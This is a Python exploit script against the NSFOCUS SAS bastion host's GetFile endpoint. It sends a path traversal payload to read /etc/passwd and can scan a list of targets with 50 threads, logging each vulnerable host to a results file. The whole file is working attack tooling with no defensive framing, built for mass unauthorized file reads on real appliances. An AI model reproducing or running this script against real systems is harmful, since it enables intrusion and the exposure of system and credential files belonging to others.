import requests,argparse,sys,re
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner ="""███████╗ █████╗ ███████╗         ██████╗ ███████╗████████╗███████╗██╗██╗     ███████╗
██╔════╝██╔══██╗██╔════╝        ██╔════╝ ██╔════╝╚══██╔══╝██╔════╝██║██║     ██╔════╝
███████╗███████║███████╗        ██║  ███╗█████╗     ██║   █████╗  ██║██║     █████╗  
╚════██║██╔══██║╚════██║        ██║   ██║██╔══╝     ██║   ██╔══╝  ██║██║     ██╔══╝  
███████║██║  ██║███████║███████╗╚██████╔╝███████╗   ██║   ██║     ██║███████╗███████╗
╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝ ╚═════╝ ╚══════╝   ╚═╝   ╚═╝     ╚═╝╚══════╝╚══════╝
                                                                                     

"""
    print(banner)
def main():
    banner()
    parser = argparse.ArgumentParser(description="绿盟 SAS堡垒机 GetFile 任意文件读取漏洞")
    parser.add_argument('-u','-url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','-file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd"
    headers = {
        'User-Agent':'Mozilla/5.0(Macintosh;IntelMacOSX10_14_3)AppleWebKit/605.1.15(KHTML,likeGecko)Version/12.0.3Safari/605.1.15',
        'Content-Type':'application/x-www-form-urlencoded',
        'Accept-Encoding':'gzip,deflate',
        'Connection':'close',
    }
    try:
        res1 = requests.get(url=target+payload,headers=headers,verify=False,timeout=5)
        if res1.status_code == 200 and re.search(r'root:', res1.text):
            print(f"[+]{target}存在任意文件读取漏洞")
            with open('lvmeng-SAS-result.txt','a')as f:
                f.write(target+'\n')
        else:
            print(f"[-]{target}不存在任意文件读取漏洞")
    except:
        pass

if __name__ == "__main__":
    main()
